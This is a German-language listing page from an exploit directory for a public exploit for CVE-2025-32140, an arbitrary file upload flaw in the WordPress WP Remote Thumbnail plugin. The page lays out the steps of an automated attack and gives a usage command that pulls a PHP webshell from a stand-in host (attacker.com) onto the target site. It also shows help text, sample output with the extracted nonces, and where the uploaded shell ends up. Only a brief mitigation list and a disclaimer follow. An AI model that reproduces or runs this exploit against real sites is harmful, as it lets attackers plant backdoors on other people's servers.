Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32140 — WordPress WP Remote Thumbnail Plugin <= 1.3.2 ist anfällig für Arbitrary File Upload. | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-32140
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-32140

CVE-2025-32140

WordPress WP Remote Thumbnail Plugin <= 1.3.2 ist anfällig für Arbitrary File Upload.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2025-32140 – WP Remote Thumbnail Exploit (Arbitrary File Upload)


📝 Beschreibung

CVE-2025-32140 ist eine kritische Sicherheitslücke im WP Remote Thumbnail-Plugin für WordPress. Sie ermöglicht es authentifizierten Angreifern (mit Beitragsersteller- oder höheren Berechtigungen), beliebige Dateien wie z. B. Webshells hochzuladen, indem sie eine fehlerhafte Funktion missbrauchen, die ungeprüfte URLs akzeptiert.

Das Plugin validiert weder den Dateityp noch den Inhalt, der von der bereitgestellten remote_thumb-URL abgerufen wird. Dadurch können Angreifer schädliche PHP-Dateien (z. B. Hintertüren) im Verzeichnis /wp-content/uploads speichern.


⚠️ Betroffene Komponente

  • Plugin: WP Remote Thumbnail
  • Betroffene Versionen: <= 1.3.2
  • Gepatchte Version: Noch nicht veröffentlicht
  • Angriffsvektor: Netzwerk
  • Erforderliche Berechtigungen: Niedrig (Authentifizierter Benutzer mit der Fähigkeit edit_post)
  • CVSS-Score: 9,9 (Kritisch)

🛠 Exploit-Skript

Dieses Python-Skript automatisiert die Ausnutzung von CVE-2025-32140 und führt die folgenden Schritte aus:

  1. Einloggen in die Ziel-WordPress-Seite.
  2. Automatisches Extrahieren erforderlicher Nonces.
  3. Erstellen und Senden einer schädlichen Anfrage über den Parameter remote_thumb.
  4. Hochladen einer Webshell auf die Zielseite.

🔧 Befehlszeilenoptionen

OptionAliasBeschreibung
--url-uURL der Ziel-WordPress-Seite (z. B. http://target.com/wordpress)
--username-unWordPress-Benutzername mit Beitragsbearbeitungsrechten
--password-pPasswort für den angegebenen Benutzernamen
--user_ID-uidWordPress-Benutzer-ID (normalerweise 1 für Admin)
--post_ID-pidID des zu bearbeitenden Beitrags (kann ein Entwurf sein)
--shellDirekte URL zu einer PHP-Webshell, die auf dem Server des Angreifers gehostet wird

🚀 Verwendung

python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php

📖 Verwendung & Hilfe


                                                                                                                
usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL

Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
  --username, -un USERNAME
                        Username
  --password, -p PASSWORD
                        Password
  --user_ID, -uid USER_ID
                        User ID (usually 1 for admin)
  --post_ID, -pid POST_ID
                        Target post ID
  --shell SHELL         URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)


📋 Beispielausgabe

[+] Logged in successfully.
[+] Cookies set successfully.
[DEBUG] Extracted _wpnonce: b4ef78e77d
[DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
[DEBUG] Extracted closedpostboxesnonce: 52be514040
[DEBUG] Extracted samplepermalinknonce: 7b213c6597
[DEBUG] Extracted wprthumb_nonce: 45803ee312
[DEBUG] Extracted X-WP-Nonce: None
[+] Exploit POST sent successfully. Check your uploads directory.
By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited


📂 Speicherort der Shell

Nach erfolgreichem Exploit befindet sich die hochgeladene Webshell voraussichtlich unter:

http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php

Ersetzen Sie YYYY/MM durch das aktuelle Jahr und den Monat des Uploads.


🛡 Empfehlungen

Um das Risiko durch diese Sicherheitslücke zu verringern:

  1. Aktualisieren Sie das Plugin auf die neueste Version (sobald ein Patch veröffentlicht ist).
  2. Beschränken Sie Dateiupload-Funktionen auf vertrauenswürdige Benutzer.
  3. Deaktivieren Sie die Funktion zum Abruf von Remote-Thumbnails, falls sie nicht benötigt wird.

⚠️ Haftungsausschluss

Dieses Skript dient ausschließlich zu Bildungszwecken.
Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Exploit verursacht werden.


👤 Autor

Von: Nxploited ( Khaled Alenazi ) 🌟

Tool herunterladen